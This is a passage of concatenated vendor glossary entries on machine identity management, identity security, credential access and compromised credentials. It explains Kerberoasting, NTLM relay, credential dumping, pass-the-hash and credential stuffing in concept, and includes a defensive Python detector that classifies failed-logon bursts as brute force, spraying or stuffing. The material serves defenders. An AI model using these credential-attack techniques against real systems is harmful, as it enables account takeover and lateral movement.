- **Ensuring Secure Communications:** Machine identities use cryptographic keys and digital certificates to establish encrypted communication channels, protecting data from interception and tampering.
- **Preventing Unauthorized Access:** Proper management of machine identities ensures that only authorized machines can access sensitive data and resources.
- **Maintaining System Integrity:** By verifying the identity of machines, organizations can prevent the use of counterfeit or compromised machines that could disrupt operations or inject malicious code.
- **Supporting Regulatory Compliance:** Many industries have regulations that require secure machine-to-machine communications. Effective machine identity management helps organizations comply with these regulations and avoid penalties.

### Growth of Machine Identities vs. Human Identities

The number of machine identities is growing at a much faster rate than human identities. With the proliferation of devices and the increasing adoption of cloud services, organizations are managing hundreds of thousands, if not millions, of machine identities. This growth far outpaces that of human identities and underscores the need for effective machine identity management systems to secure and manage these identities.

### Types of Machine Identities

#### Devices and Workloads

Machine identities span a wide array of entities within an IT ecosystem. These include:

- **Physical Devices:** Traditional hardware like computers, smartphones, and IoT devices all require machine identities for secure communication and operation within a network.
- **Virtual Machines:** Instances running on cloud infrastructure also need unique identifiers to ensure secure provisioning, operation, and decommissioning.
- **Containers:** With the rise of containerized applications, each container instance needs a machine identity to secure its interactions and lifecycle operations.
- **IoT Devices:** These devices, ranging from smart home appliances to industrial sensors, require machine identities to ensure secure data transmission and control.

#### Software Components

Beyond physical and virtual devices, various software components also need machine identities:

- **APIs:** Application Programming Interfaces (APIs) are integral to modern software ecosystems. Machine identities ensure secure API calls and data exchanges between applications.
- **Algorithms and Services:** Machine learning models, microservices, and other backend services also need secure identities to protect their operations and interactions.
- **Code:** Code signing certificates provide assurance that software or code has not been altered, ensuring the integrity and authenticity of the code being executed.

### The Role of Machine Identity Management

#### Security and Authentication

Machine identity management ensures the security and integrity of machine-to-machine communications through the use of digital certificates and cryptographic keys. These tools verify the identity of machines, allowing them to establish secure connections and exchange data safely. By using encryption methods such as Transport Layer Security (TLS) and Secure Sockets Layer (SSL), machine identities prevent unauthorized access and protect sensitive information from being intercepted during transmission.

#### Confidentiality, Integrity, Availability (CIA Triad)

Machine identities play a crucial role in upholding the CIA triad in cybersecurity:

- **Confidentiality:** Ensures that data is accessible only to authorized machines. Digital certificates and encryption keys prevent unauthorized machines from accessing sensitive information.
- **Integrity:** Guarantees that the data exchanged between machines is not tampered with during transmission.
  Machine identities help detect and prevent data manipulation by verifying the source and destination of the data.
- **Availability:** Ensures that authorized machines have reliable access to necessary data and services. Proper management of machine identities helps maintain operational continuity by preventing outages due to expired or compromised certificates.

#### Preventing Machine Identity Theft

Machine identity theft occurs when cybercriminals forge or steal digital certificates and keys to impersonate legitimate machines. Effective machine identity management mitigates this risk by:

- **Certificate Lifecycle Management:** Regularly renewing and revoking certificates to prevent the use of expired or compromised credentials.
- **Key Management:** Securely storing and rotating cryptographic keys to minimize the risk of key theft or misuse.
- **Monitoring and Alerts:** Implementing systems to monitor certificate and key usage, and alerting administrators to any suspicious activities.

### Key Components of Machine Identity Management

#### Public Key Infrastructure (PKI)

Public Key Infrastructure (PKI) forms the backbone of machine identity management by providing the means to create, distribute, manage, and revoke digital certificates. PKI ensures secure communications and trusted identities through the use of:

- **Digital Certificates:** These are electronic documents that use a digital signature to bind a public key with an identity. X.509 certificates are the most common type used for machine identities.
- **Certificate Authorities (CAs):** Trusted entities that issue and revoke digital certificates. They validate the identity of machines before issuing certificates, ensuring the authenticity of the identity.
- **Revocation Lists:** Lists maintained by CAs that contain revoked certificates, which are no longer trusted. This helps in preventing the use of compromised or expired certificates.

#### Encryption and Key Management

Effective encryption and key management are crucial for securing machine identities.
Key management involves the generation, distribution, storage, rotation, and revocation of cryptographic keys. Important aspects include:

- **Public and Private Keys:** Asymmetric encryption involves a pair of keys—public and private. The public key encrypts data, which can only be decrypted by the corresponding private key.
- **Secure Key Storage:** Keys must be stored securely to prevent unauthorized access. Hardware Security Modules (HSMs) are often used to provide physical security for key storage.
- **Key Rotation:** Regularly updating cryptographic keys to mitigate the risk of key compromise. Automated key rotation policies help in maintaining security without disrupting operations.

#### Automation and Orchestration

Automation and orchestration play a significant role in managing the lifecycle of machine identities efficiently. Automated tools and platforms can handle tasks such as:

- **Certificate Issuance and Renewal:** Automating the issuance and renewal processes reduces human error and ensures that certificates are always up to date.
- **Revocation and Replacement:** Automated systems can quickly revoke compromised certificates and issue new ones, minimizing the window of vulnerability.
- **Policy Enforcement:** Automated tools can enforce policies for certificate and key management, ensuring compliance with security standards and regulatory requirements.

#### Zero Trust Principles

Zero Trust security models are increasingly being adopted to enhance machine identity management. The core idea is to trust nothing and verify everything, ensuring robust security by:

- **Continuous Verification:** Continuously verifying machine identities throughout their interactions, rather than assuming trust based on network location or previous verification.
- **Least Privilege Access:** Granting machines only the minimum access necessary for their function, reducing the potential impact of compromised identities.
- **Micro-Segmentation:** Dividing the network into smaller segments to contain potential breaches and limit unauthorized access.

#### Compliance and Governance

Maintaining compliance with regulatory requirements and governance standards is crucial for machine identity management. This involves:

- **Regulatory Compliance:** Adhering to industry-specific regulations that mandate secure machine-to-machine communications, such as GDPR, HIPAA, and PCI-DSS.
- **Governance Frameworks:** Implementing frameworks to manage and govern machine identities, ensuring that policies are enforced consistently and effectively.
- **Audit Trails:** Maintaining detailed logs of certificate and key usage to support audits and investigations.

### Challenges in Machine Identity Management

#### Volume and Complexity

Managing the volume and complexity of machine identities is one of the most significant challenges in modern IT environments. With the rapid proliferation of devices, containers, and microservices, organizations must handle thousands or even millions of machine identities. This growth necessitates scalable solutions capable of managing the dynamic and ephemeral nature of these identities.

- **Proliferation of Devices:** The number of connected devices, including IoT devices and virtual machines, is increasing exponentially. Each device requires a unique identity, adding to the management burden.
- **Ephemeral Nature:** Containers and virtual machines often have very short lifespans, requiring frequent issuance and revocation of certificates and keys. This transient nature complicates traditional identity management practices.

#### Visibility and Control

Maintaining visibility and control over machine identities across diverse and distributed environments is crucial for security and compliance.

- **Centralized Management:** Organizations struggle to implement centralized management systems that provide visibility into all machine identities. Without this, it’s challenging to track and manage identities effectively.
- **Inventory Management:** Keeping an accurate inventory of all machine identities is essential for ensuring that expired or compromised certificates are promptly renewed or revoked. Automated tools can assist in maintaining this inventory and reducing the risk of oversight.

#### Manual Processes

Manual management of machine identities is time-consuming, error-prone, and often insufficient for meeting the demands of modern IT environments.

- **Human Error:** Manually tracking, issuing, and renewing certificates and keys increases the likelihood of errors, such as forgetting to renew a certificate or incorrectly configuring a key.
- **Resource Intensive:** Manual processes require significant time and resources from IT and security teams, diverting attention from other critical tasks.

#### Compliance and Governance

Adhering to regulatory requirements and maintaining governance over machine identities is an ongoing challenge for many organizations.

- **Regulatory Requirements:** Different industries have varying regulations that mandate secure machine-to-machine communication. Ensuring compliance with these regulations requires robust machine identity management practices.
- **Governance Frameworks:** Implementing governance frameworks that enforce policies and controls over machine identities is essential for maintaining security and compliance. This includes enforcing the principle of least privilege and ensuring that only authorized machines have access to sensitive data and resources.

### Best Practices to Overcome Challenges

Organizations can adopt several best practices to address these challenges effectively:

- **Automation:** Utilizing automated tools for certificate issuance, renewal, and revocation can significantly reduce the risk of human error and improve efficiency.
- **Centralized Management Platforms:** Implementing centralized platforms for machine identity management provides comprehensive visibility and control, streamlining the management process.
- **Regular Audits:** Conducting regular audits of machine identities ensures that all certificates and keys are up to date and compliant with regulatory requirements.

Machine identity management is a critical component of modern cybersecurity. As the number of machines continues to grow and IT environments become more complex, organizations must adopt robust, automated, and scalable solutions to manage and secure machine identities effectively. Embracing future trends and emerging technologies will help ensure that machine identities remain secure, enabling safe and reliable machine-to-machine communications.

---

- Published: 2024-05-26
- Modified: 2025-08-22
- URL: https://www.silverfort.com/glossary/identity-security/

Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise.

### What is Identity Security?

Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise. It ensures that only the right people (or machines) get access to the right resources at the right time, and for the right reasons.

Unlike traditional identity and access management (IAM), which focuses on provisioning, authorization, and entitlements, identity security is proactive. It detects threats, enforces least privilege, prevents lateral movement, and fortifies every corner of your infrastructure. Think of IAM as your identity infrastructure and identity security as the protective layer securing your identity infrastructure and the identities within.

Welcome to your definitive guide to Identity Security—a fast-evolving field that’s reshaping how organizations protect their most critical asset: identity. Whether you’re a CISO, security analyst, or just curious about how the digital world keeps its gates locked (and who holds the keys), this glossary will take you from the fundamentals to futuristic best practices.

### Why does identity security matter?
In a world where identities are the new perimeter, securing them is mission critical. Identities and IAM infrastructure need protection just like cloud infrastructure, endpoints, or networks. Identity-first attacks continue to be the weapon of choice for cyber-attackers. Traditionally, organizations attempt to solve this challenge with a patchwork of controls and tools, but the tools are outdated, or are simply another management solution rather than security. This approach leaves gaps and blind spots that go unprotected, leaving systems vulnerable to attack.

Identity security is as important as endpoint security or cloud security, which is why this category is extremely fast-moving and being rapidly adopted. According to the 2024 Verizon Data Breach Investigations Report, identity was the most implicated cause in reported breaches over the past year. Identity security exists to tackle this challenge.

As organizations evolve beyond traditional networks to cloud-based infrastructures, SaaS applications, and hybrid working environments, identities have been given unprecedented levels of power. They consist of employees, third parties, and machines, all freely navigating from on-prem applications and resources to cloud infrastructures and SaaS applications, from different devices and endpoints around the world. This is great news for organizations in search of flexibility and efficiency—but not so much for security teams responsible for protection, governance, and compliance.

Today’s attackers are focused on identities. They’re stealing credentials, compromising legitimate accounts, and quietly navigating through environments to reach sensitive data. The problem? It’s harder than ever for organizations to maintain a clear view of who (or what) has access to what—and whether that access is appropriate or secure. Without identity security, your infrastructure is only as strong as its weakest login.
### Real-world impact: identity security in action

| Scenario | With Identity Security | Without Identity Security |
| --- | --- | --- |
| Compromised admin account | Blocked with MFA + real-time enforcement | Potential domain takeover |
| Shadow service account | Detected and removed automatically | Credential theft + lateral movement |
| Zero Trust strategy | Enforced across all environments | Policy gaps + privilege creep |
| Regulatory audit | Automated evidence and reporting | Manual chaos and noncompliance |

### Who and what does identity security secure?

Attackers don’t discriminate, and neither should your identity security. Every identity, regardless of type or privilege level, must be secured wherever it operates in your estate, no matter what it is doing. Identity security doesn’t end with individual identities: it’s about protecting your resources and environments too.

| Identities | Why it matters |
| --- | --- |
| Human users | Your workforce, your first line of risk |
| Non-human identities | Service accounts, APIs, bots—often overlooked, heavily privileged |
| Privileged users | High-value targets for attackers |
| Third parties | Vendors, contractors—risky by default |
| AI agents | Fast-acting, highly connected, and vulnerable |

Environments that must be covered by identity security include on-prem, cloud and multi-cloud, hybrid, and OT (Operational Technology), while resources range from command-line tools to modern cloud workloads, SaaS apps, and legacy systems. As more and more companies design hybrid and on-prem environments, it becomes even more important for them to move away from a patchwork of identity tools and security controls to a holistic identity security solution that acts as a security layer for your identity fabric.

### Identity and Access Management (IAM) vs. Identity Security: What’s the difference?

IAM provides the foundation—Identity Security enhances and enforces it. Said another way, IAM is the infrastructure plane, and identity security is the control plane.
IAM primarily focuses on provisioning, managing, and de-provisioning user identities and access permissions. It is essential for operational efficiency, regulatory compliance, and reducing administrative overhead. Identity security complements IAM by addressing the security gaps that IAM solutions often leave open. While IAM provides the foundational framework for managing identities and access, identity security ensures that those identities are protected from threats such as credential theft, privilege escalation, and lateral movement. For a comprehensive security posture, organizations should integrate IAM with identity security measures. This integration gives a holistic approach to managing and securing identities, combining the strengths of IAM's access management with the threat detection and response capabilities of identity security, so that organizations get robust protection against identity-based attacks while maintaining operational efficiency and compliance. Core elements of IAM include authentication, authorization, auditing, logging and monitoring, and elements of privileged access management. Authentication Authentication is the process of verifying that users are who they claim to be. Strong authentication mechanisms are essential to prevent unauthorized access. Multi-factor authentication (MFA) is a widely used method that requires users to present two or more verification factors to gain access to a resource: something the user knows (a password), something the user has (a security token), and something the user is (a biometric). Authentication is usually a core part of IAM solutions; in some cases, however, advanced authentication that can protect legacy resources is found in an identity security product instead. Authentication can therefore sit in both the infrastructure layer and the security layer.
Authorization Authorization determines what an authenticated user is allowed to do. It involves setting and enforcing permissions and access controls based on the user's role within the organization. Role-based access control (RBAC) is a common approach: permissions are assigned to roles rather than to individuals, which helps ensure that users have only the access they need to perform their duties. Privilege management Privilege management focuses on controlling and monitoring elevated access rights to minimize the risks associated with privileged accounts. This includes implementing the principle of least privilege, where users are granted the minimum access or permissions needed to perform their job functions. Privileged Access Management (PAM) solutions help manage and audit the use of privileged accounts, reducing the risk of misuse or compromise. PAM is typically considered part of both the infrastructure and the security layer because it puts policy controls around privileged access and accounts. As organizations have evolved, however, the market has recognized that privileged access needs to be secured, not just managed. It is also demanding easier ways to deploy privileged access security, because legacy PAM deployments are lengthy and time-consuming and often fail to deliver results. Audit, Logging and Monitoring Continuous audit, logging, and monitoring are vital for maintaining security and compliance. These activities track access and identity-related activity across systems to detect suspicious behavior, ensure policy compliance, and provide forensic evidence in the event of a security incident. Effective monitoring helps organizations identify and respond to potential threats in real time, reducing the impact of security breaches. IAM infrastructure is the foundational identity management and basic access control layer that identity security sits above and enhances.
While IAM infrastructure incorporates some basic security features, such as MFA, identity security provides a complete security layer that protects against unauthorized access, misuse of privileges, and identity-based attacks. With seamless integration between these two complementary elements of enterprise identity, organizations can significantly reduce their attack surface and improve their overall security posture.

| Feature | Identity & Access Management (IAM) | Identity Security |
|---|---|---|
| Focus | Authentication and provisioning | Inline threat prevention and enforcement |
| Visibility | Limited to managed systems | Continuous across all environments |
| Enforcement | Passive and limited | Real-time, risk-aware |
| Coverage | Human identities | Human and non-human identities, including service accounts |
| Threat detection | Minimal | Built-in, proactive |
| Compliance reporting | Manual | Automated, real-time |

Critical real-world identity security use cases. Use case #1: Protect privileged access. Replace vaulting with JIT access, tiering, and policy enforcement. Traditional privilege management, centered on vaulting and password rotation, fails to provide real-time visibility and enforcement, leaving organizations exposed. Further, legacy PAM solutions leave blind spots and are difficult to deploy, making it hard to protect privileged identities in a timely and holistic way. Simply managing privileged accounts is not enough: concrete security controls must be in place to prevent privilege sprawl and unauthorized access.
With identity security, protecting privileged access should look like:

- Automatically discovering and classifying all privileged accounts into tiers based on actual usage
- Applying Just-In-Time (JIT) access to domain privileged accounts with a single click, so that no privilege is granted without an expiration
- Enforcing least privilege policies with virtual fencing to prevent unauthorized privilege escalation
- Eliminating dependency on vaulting and password rotation

Use case #2: Stop lateral movement before it starts. Use MFA on command-line interfaces, detect in real time, contain attacks instantly. Compromised credentials often lead to escalated privileges that reach business-critical assets. Traditional detection and response capabilities lack visibility into all identities everywhere (from on-prem to the cloud, from human to NHI), allowing threats to spread undetected. To prevent breaches from escalating, organizations must stop unauthorized access before attackers embed themselves deeper. With identity security, stopping lateral movement looks like:

- Enforcing MFA on all access interfaces, including legacy systems, air-gapped networks, IT/OT, and command-line tools such as PowerShell, PsExec, and WMI
- Implementing real-time detection and attack containment to block malicious attempts instantly and isolate compromised accounts before privilege escalation can occur
- Using AI to continuously analyze authentication attempts and identify anomalies, so that credential misuse is prevented rather than discovered after the fact
- Integrating identity-first incident response that halts attacks immediately, without manual intervention

Use case #3: Apply Zero Trust. Enforce dynamic, risk-based access everywhere: cloud, SaaS, and on-prem. Identity is still the weakest link for many organizations, but traditional security tools struggle to enforce least privilege access across hybrid environments.
Without universal enforcement and adaptive controls, organizations risk identity-driven breaches that undermine Zero Trust principles. With identity security, applying Zero Trust looks like:

- Extending Zero Trust to every identity by enforcing least-privilege access policies for all human and non-human identities, eliminating standing privileges
- Enforcing Just-In-Time (JIT) access, with dynamic, time-bound approvals that reduce exposure without disrupting workflows
- Continuously authenticating and monitoring access, verifying every access request with risk-based, adaptive controls that adjust automatically as threats evolve
- Unifying Zero Trust across all environments to secure access to cloud, SaaS, and on-prem resources, without complex integrations or additional agents

Use case #4: Secure AD service accounts. Auto-discover, monitor, and protect NHIs without disrupting workflows. AD service accounts often have elevated privileges, static credentials, and little direct oversight, which makes them a prime target for attackers. Without comprehensive visibility and control, these NHIs become an unchecked security risk that enables credential theft and lateral movement. With identity security, protecting AD service accounts looks like:

- Automatically discovering and continuously monitoring all service accounts across Active Directory, including unmanaged and orphaned accounts
- Enforcing least privilege access with adaptive Zero Trust policies that block unauthorized authentication attempts and prevent lateral movement
- Securing service accounts at scale without disruptive password resets, so protection does not cause operational downtime
- Analyzing authentication patterns to detect and block suspicious service account activity in real time

Use case #5: Map the identity attack surface. Uncover shadow admins, legacy protocols, and misconfigurations.
Misconfigurations, legacy protocols, and excessive privileges expose organizations to risks such as lateral movement and privilege escalation. Without proactive identity security posture management (ISPM), it is very hard to analyze and prioritize the most critical exposures by exploitation probability and impact. With identity security, mapping the identity attack surface looks like:

- Automatically identifying weaknesses such as legacy authentication protocols, shadow admin accounts, and misconfigured domain settings that create security risks
- Continuously monitoring and hardening Active Directory, cloud IdPs, and federated authentication systems to...

---
- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/credential-access/

A stage in the cyberattack lifecycle where adversaries obtain legitimate credentials to impersonate users and bypass security controls. Credential access is the phase of the cyber attack lifecycle in which an attacker obtains unauthorized access to a system's credentials. This step, recognized as a tactic in the MITRE ATT&CK framework, enables attackers to pose as legitimate users and bypass security measures designed to stop unauthorized access. Credential access methods are as diverse as they are innovative, ranging from phishing campaigns that deceive users into divulging their login credentials to brute force attacks that guess passwords until the correct one is found. Exploitation of weak or default passwords is also widespread, an all-too-common oversight, as is malware that harvests credentials directly from a user's computer. With valid credentials in hand, an attacker can gain access to sensitive information, manipulate data, install malicious software, and create backdoors for future access, all while remaining undetected.
These breaches have far-reaching implications, posing significant risks not only to the immediate security of data but to the integrity of an organization's entire digital infrastructure. The Impact of Credential Access on Businesses The ramifications of credential access extend far beyond the immediate breach of security systems; they permeate every facet of a business, causing financial, reputational, and operational damage. This section examines that impact and why stringent security measures are necessary. Financial Losses: Credential access attacks commonly result in direct financial losses. Malicious actors can use the credentials to siphon funds, execute fraudulent transactions, or divert financial transfers. Businesses also face significant costs in responding to breaches, including forensic investigations, system remediation, and legal fees. According to the IBM Security and Ponemon Institute report, the average cost of a data breach in 2020 was $3.86 million, underscoring the economic threat posed by credential access. Reputational Damage: Trust is the cornerstone of customer relationships, and credential access breaches can damage that trust irreparably. News of a breach can lead to loss of customers and partners and to a fall in stock market value. The long-term reputational damage can far exceed the immediate financial losses, affecting a company's prospects and growth; rebuilding customer trust takes substantial effort and time, with no guarantee of full recovery. Operational Disruptions: Credential access can disrupt business operations, causing downtime and lost productivity. Attackers can use the credentials to deploy ransomware, causing widespread system lockouts. In such scenarios, critical business processes halt, leading to revenue loss and strained relationships with clients and stakeholders.
The cascading effect of operational disruptions can be devastating, especially for small and medium-sized enterprises (SMEs) with limited resources. Identifying Vulnerabilities and Attack Vectors The key to preventing credential access is understanding the vulnerabilities and attack vectors that attackers exploit. Identifying these weak points lets security and IT teams implement targeted measures to strengthen their defenses. This section examines common vulnerabilities that lead to credential access and outlines strategies for mitigating them. Common Vulnerabilities Leading to Credential Access System Misconfigurations: Incorrectly configured systems offer easy entry points for attackers. Misconfigurations include insecure default settings, unnecessary services running on critical systems, and improper file permissions. Regular audits and adherence to security best practices mitigate these risks. Outdated Software: Attackers frequently target software vulnerabilities to gain unauthorized access, and software that is not regularly patched presents a significant risk. A robust patch management process ensures that vulnerabilities are addressed promptly. Legacy protocols are a related exposure: NTLM authentication, for example, lets an attacker who can observe or relay the exchange capture material that can be cracked offline or replayed. Weak Authentication Methods: Reliance on single-factor authentication, especially with weak or reused passwords, significantly increases the risk of credential access. Enforcing strong password policies and multi-factor authentication (MFA) dramatically improves security. Admins with SPN: A Service Principal Name (SPN) is the unique identifier of a service instance. Any authenticated domain user can request a service ticket for an SPN, and that ticket is encrypted with a key derived from the service account's password, so it can be taken offline and cracked (Kerberoasting). Attackers therefore look for accounts that carry an SPN and also hold admin rights: cracking one password gives access to every resource that account can reach.
Role of Social Engineering and Phishing in Credential Access Social engineering attacks, particularly phishing, are primary methods attackers use to gain credentials. These attacks manipulate users into sharing their credentials or installing malware that captures keystrokes. Educating employees about phishing and deploying advanced email filtering reduce the effectiveness of these attacks. Emerging Trends and Techniques in Credential Access Attacks AI-Powered Phishing Campaigns: Malicious actors are using artificial intelligence (AI) to craft more convincing phishing emails and messages, making it harder for users to distinguish legitimate from malicious communications. Credential Stuffing: Automated attacks that replay previously breached credentials against accounts on other services, relying on password reuse. Account lockout policies, rate limiting, and monitoring for unusual login patterns help mitigate these attacks. Credential Dumping: Extracting account credentials from a compromised system, typically from process memory, the registry hives, or the local credential store. The aim is to gather valid credentials (usernames with passwords or hashes) that can be used for further attacks such as lateral movement, privilege escalation, or access to restricted systems and data. Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) Attacks: Techniques that authenticate to a remote server or service using a stolen NTLM hash or Kerberos ticket, with no need for the user's plaintext password. Strict access controls and monitoring for abnormal authentication patterns are crucial defenses against these techniques.
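The credential stuffing and pass-the-hash entries above both end with the same recommendation: watch for unusual authentication patterns. As an added example, not part of the original glossary entry, the following Python labels a burst of failed logons as brute force, password spraying or credential stuffing using only fields that Windows 4625/4624 events carry (account name, source address, NTSTATUS sub-status, outcome), and flags a success that follows a burst from the same source. The event records are constructed inline; the thresholds and the "many unknown user names means a replayed leak" heuristic are assumptions for illustration, not a vendor rule set.

```python
"""Label failed-logon bursts as brute force, password spraying or credential
stuffing from 4625/4624-shaped records. Thresholds are assumptions."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)
STATUS_BAD_PASSWORD = "0xC000006A"  # 4625 sub-status: wrong password for a valid account
STATUS_NO_SUCH_USER = "0xC0000064"  # 4625 sub-status: user name does not exist


@dataclass(frozen=True)
class LogonEvent:
    ts: datetime
    event_id: int      # 4625 = failed logon, 4624 = successful logon
    user: str
    src_ip: str
    status: str = ""   # NTSTATUS sub-status on 4625, empty on 4624


def detect(events, window=timedelta(minutes=10), min_failures=10,
           spray_users=5, unknown_user_ratio=0.3):
    """Bucket events by (source IP, fixed time window) and label each bucket.

    Heuristics (assumptions for this example, tune to your environment):
      brute_force         - >= min_failures failures against one or two accounts
      password_spraying   - failures spread over >= spray_users accounts with at
                            most two attempts per account (one guess per user)
      credential_stuffing - the spraying shape, but a large share of the user
                            names do not exist locally, which is what replaying a
                            leaked user:password list from another site looks like
    A 4624 from a source that also produced a failure burst is reported as a
    possible takeover so responders can act on it first.
    """
    buckets = defaultdict(list)
    for e in events:
        buckets[(e.src_ip, (e.ts - EPOCH) // window)].append(e)

    findings = []
    for (src, slot), evs in sorted(buckets.items()):
        failures = [e for e in evs if e.event_id == 4625]
        if len(failures) < min_failures:
            continue                      # below the noise floor for this window
        per_user = defaultdict(int)
        for e in failures:
            per_user[e.user] += 1
        unknown = sum(e.status == STATUS_NO_SUCH_USER for e in failures)

        if len(per_user) <= 2:
            verdict = "brute_force"
        elif len(per_user) >= spray_users and max(per_user.values()) <= 2:
            verdict = ("credential_stuffing"
                       if unknown / len(failures) >= unknown_user_ratio
                       else "password_spraying")
        else:
            verdict = "suspicious_failures"

        takeover = sorted({e.user for e in evs
                           if e.event_id == 4624 and e.user in per_user})
        findings.append({
            "src_ip": src,
            "window_start": EPOCH + slot * window,
            "verdict": verdict,
            "failures": len(failures),
            "distinct_users": len(per_user),
            "possible_takeover": takeover,
        })
    return findings


def sample_events():
    """Constructed telemetry for four patterns; not captured from a real domain."""
    base = datetime(2024, 5, 21, 9, 0, 0)
    evs = []
    # 1) brute force: one source hammering a single service account
    for i in range(12):
        evs.append(LogonEvent(base + timedelta(seconds=3 * i), 4625,
                              "svc_backup", "10.0.0.5", STATUS_BAD_PASSWORD))
    # 2) password spraying: one or two guesses per account across eight valid
    #    accounts, then a success for one of them
    for i, user in enumerate(f"user{n:02d}" for n in range(1, 9)):
        for k in range(2 if i < 5 else 1):
            evs.append(LogonEvent(base + timedelta(seconds=40 + 2 * i + k), 4625,
                                  user, "203.0.113.7", STATUS_BAD_PASSWORD))
    evs.append(LogonEvent(base + timedelta(seconds=90), 4624, "user03", "203.0.113.7"))
    # 3) credential stuffing: a replayed leak where half the names do not exist here
    for i in range(12):
        status = STATUS_NO_SUCH_USER if i % 2 else STATUS_BAD_PASSWORD
        evs.append(LogonEvent(base + timedelta(seconds=120 + i), 4625,
                              f"leaked{i:02d}@example.com", "198.51.100.9", status))
    # 4) benign: a user mistyping twice, below every threshold
    for i in range(2):
        evs.append(LogonEvent(base + timedelta(seconds=200 + i), 4625,
                              "alice", "10.0.0.20", STATUS_BAD_PASSWORD))
    return evs


if __name__ == "__main__":
    for f in detect(sample_events()):
        print(f["src_ip"], f["verdict"], f["failures"], f["distinct_users"],
              f["possible_takeover"])
```

Run directly, it prints one line per flagged source; the benign source never appears. In production the same grouping would run over a SIEM export, with the window aligned to the lockout observation window and the unknown-user ratio tuned to how often your own users mistype account names.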
Best Practices for Preventing Credential Access To protect against the threats posed by credential access, organizations must adopt a proactive, multi-layered approach that integrates technological controls with human-centric measures. This section outlines best practices that are fundamental to preventing unauthorized access to credentials. Strong Password Policies and the Use of Password Managers Enforce Strong Passwords: Require long passwords and screen them against lists of known-breached and commonly used passwords; length and uniqueness matter more than forced mixes of character classes, which tend to produce predictable substitutions. Password Changes: Block reuse of old passwords and force a change whenever there is evidence of compromise. Current NIST guidance (SP 800-63B) advises against mandatory changes on a fixed schedule, since routine rotation pushes users toward incremental, guessable variations. Password Managers: Encourage the use of reputable password managers. These tools generate and store complex, unique passwords for each account, reducing reliance on memorable (and guessable) passwords and the risk of reuse. Implementation of Multi-Factor Authentication (MFA) Layered Security: MFA adds a layer of security by requiring two or more verification methods to gain access to systems, significantly reducing the risk of unauthorized access. Diverse Authentication Factors: Combine something the user knows (password), something the user has (security token, smartphone), and something the user is (biometric verification). Adaptive Authentication: Consider adaptive or risk-based authentication, which adjusts the required level of authentication to the user's location, device, or network. Regular Security Audits and Vulnerability Assessments Identify Weaknesses: Conduct regular security audits and assessments to identify and address risks in system architecture, configurations, and deployed software.
Penetration Testing: Simulate attacks through penetration testing to evaluate the effectiveness of current controls and uncover pathways to credential access. Employee Training and Awareness Programs Phishing Awareness: Educate employees about phishing and social engineering. Regular training helps users recognize and respond appropriately to attempts to acquire sensitive information. Security Best Practices: Foster a culture of security awareness in the organization, emphasizing secure password practices, proper handling of sensitive information, and recognition of suspicious activity. Advanced Protective Measures To further strengthen defenses against credential access, organizations should adopt advanced protective measures on top of the foundational practices. Zero Trust Architecture: Principles and Implementation Never Trust, Always Verify: Zero Trust is a security model in which nothing inside or outside the perimeter is trusted automatically; every request to connect to a system is verified before access is granted. Microsegmentation: Divide the network into small zones with separate access controls, so that compromise of one zone does not give an attacker access to the rest. Least Privilege Access Control: Users and systems get only the minimum access or permissions needed to perform their tasks, which limits the damage a compromised credential can do.
Role of Identity and Access Management (IAM) Solutions in Securing Credentials Centralized Credential Management: IAM solutions provide a central platform for managing user identities and their access rights, which makes it easier to enforce strong security policies and to monitor for suspicious activity. Single Sign-On (SSO) and Federated Identity Management: Reduce the number of passwords users must remember, shrink the phishing surface, and improve user experience by enabling single sign-on across applications and systems; the identity provider then becomes a high-value target that deserves the strongest authentication. Behavioral Analytics and Machine Learning for Detecting Anomalous Access Patterns User and Entity Behavior Analytics (UEBA): Use analytics to detect anomalies in user behavior that may indicate compromised credentials. By establishing a baseline of normal activity, these systems flag unusual actions for investigation. Machine Learning: Apply machine learning to keep improving anomaly detection over time, adapting to evolving attacker tactics. Credential Access in Cloud Environments Secure Cloud Configuration and Access Controls: Adopt cloud-specific security practices, including cloud access security brokers (CASBs), to extend visibility and control over cloud services and ensure secure configuration. Cloud Identity Governance: Use robust identity governance to manage digital identities in cloud environments, ensuring that users have access rights appropriate to their roles and responsibilities. Credential access is an ongoing contest in which attackers and defenders constantly evolve their strategies. Security professionals must understand credential access methods, motivations, and indicators to craft effective defenses.
As we go deeper into this topic, we will examine the vulnerabilities that lead to credential access, the consequences of such breaches, and the advanced strategies organizations can use to mitigate these risks. By breaking down the concept of credential access and its role in the broader landscape of cyber threats, this section lays the groundwork for a comprehensive look at how businesses can protect themselves against this ever-present danger.

---
- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/compromised-credential/

Login details, such as usernames and passwords, that have been stolen or exposed and can be misused for unauthorized access or lateral movement. Compromised credentials are login details that have been stolen or accessed by unauthorized parties. They typically include usernames, passwords, security questions, and other sensitive details used to verify a user's identity and gain access to accounts and systems. The risks are severe. Stolen credentials can be used to impersonate legitimate users, gain unauthorized access to sensitive data and accounts, move laterally, install malware, steal funds, and more. Compromised credentials are one of the most common attack vectors in data breaches. Common Causes of Compromised Credentials There are a few common ways credentials become compromised: Phishing attacks: Phishing emails containing malicious links or attachments trick users into entering their login details on spoofed sites that capture them. Keylogging malware: Malware installed on a user's device records keystrokes, capturing usernames, passwords, and other sensitive data. Data breaches: When a service is breached, user credentials and other personal information are often stolen.
Attackers then use the stolen credentials to access other accounts and systems. Reusing passwords: When a user has the same password on many accounts and one of those accounts is breached, every other account that shares the password is compromised too. Social engineering: Skilled social engineers manipulate human psychology to convince targets to share login credentials in person, over the phone, or online. In summary, compromised credentials pose a severe threat, and both individuals and organizations should take proactive measures to prevent and mitigate the risks of stolen login details. With compromised credentials, unauthorized access is often just a login away. How Credentials Get Compromised Credentials are stolen or compromised in several common ways: Phishing attacks: Phishing emails trick users into entering their login credentials on spoofed websites, where they are stolen. Phishing is one of the leading causes of compromised credentials. Data breaches: When companies suffer breaches that expose customer data, login credentials are frequently among the stolen data. They are then sold on the dark web and used to access other accounts. Weak passwords: Easy-to-guess or reused passwords make accounts an easy target. Once a password has been compromised on one site, attackers try the same password on other popular sites. Keylogging malware: Keyloggers capture keystrokes, including login credentials, and transmit the stolen data back to the attackers. Social engineering: Skilled social engineers manipulate human psychology to convince targets to share login credentials in person, over the phone, or digitally.
